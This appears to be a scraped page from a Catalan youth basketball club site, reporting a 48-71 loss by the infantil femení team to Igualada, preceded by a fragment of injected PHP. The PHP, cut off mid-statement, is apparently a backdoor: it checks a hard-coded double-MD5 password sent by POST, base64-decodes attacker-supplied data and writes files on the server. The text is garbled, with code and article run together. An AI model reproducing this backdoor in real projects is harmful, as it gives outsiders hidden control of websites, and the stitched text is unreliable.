function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Un parcial de 0-9 en el primer quart trenca les aspiracions de l'infantil femení P (48-71) - Tgn Bàsquet Club -

Un parcial de 0-9 en el primer quart trenca les aspiracions de l’infantil femení P (48-71)

Updated: febrer 16, 2016

L’equip infantil femení P del TGN Bàsquet va perdre contra l’Igualada en un partit que es va decidir en el primer període. Així, tot i el bon inici de les locals, un parcial visitant ded 0-9 va obrir una escletxa que les jugadores que entrena Agustí Oriol, per molta feina que van fer, no van poder tancar.